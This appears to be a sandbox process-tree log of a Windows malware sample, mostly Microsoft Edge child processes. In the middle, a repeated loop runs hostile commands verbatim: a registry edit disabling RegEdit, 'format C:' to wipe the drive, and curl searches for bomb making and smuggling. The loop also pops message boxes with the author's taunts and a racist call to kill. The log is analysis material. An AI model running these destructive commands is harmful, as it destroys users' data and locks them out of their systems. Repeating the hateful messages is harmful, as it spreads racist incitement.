C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x34c,0x7ffac08ef208,0x7ffac08ef214,0x7ffac08ef2205⤵PID:1640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:115⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2116,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:25⤵PID:5368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2480,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:135⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3416,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:15⤵PID:304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3424,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:15⤵PID:948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4764,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:145⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4612,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:145⤵PID:1996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5456,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:15⤵PID:2628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5780,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:145⤵PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6108,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:145⤵PID:1436
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11286⤵PID:5612
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:145⤵PID:1288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:145⤵PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=4164,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:15⤵PID:4224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6544,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:15⤵PID:872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6612,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:15⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6944,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:15⤵PID:5704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6180,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7144 /prefetch:15⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6556,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7188 /prefetch:15⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7564,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7584 /prefetch:15⤵PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7652,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7492 /prefetch:15⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7852,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7832 /prefetch:15⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7992,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=8028 /prefetch:15⤵PID:3512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window5⤵PID:2500
-
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
PID:3088
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
PID:3740
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5108
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1252
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4152
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5476
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3696
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4668
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:2268
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2272
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4240
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4000
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4656
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5436
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:544
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1032
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3512
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:780
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3180
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5108
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3704
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3804
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:484
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5320
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5284
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2708
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5936
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5468
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4068
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1480
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1064
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4196
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2336
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4868
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1900
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:740
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3608
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4708
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:2556
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4696
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1076
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4372
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3504
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2324
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5948
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2940
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4124
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1860
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3172
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5292
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:2908
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5464
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6064
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6008
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffac08ef208,0x7ffac08ef214,0x7ffac08ef2205⤵PID:5292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1784,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2564 /prefetch:115⤵PID:2448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2536,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:25⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2092,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:135⤵PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3404,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:15⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3412,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3700 /prefetch:15⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:15⤵PID:1996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5024,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:15⤵PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5224,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5244 /prefetch:15⤵PID:3120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5404,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:15⤵PID:4104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5628,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:15⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5788,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:15⤵PID:4028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:145⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6016,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:145⤵PID:3052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6364 /prefetch:145⤵PID:4044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7128,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:145⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7128,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:145⤵PID:2408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=7488,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7524 /prefetch:15⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7884,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=7932 /prefetch:15⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=3416,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=8244 /prefetch:15⤵PID:124
-
-
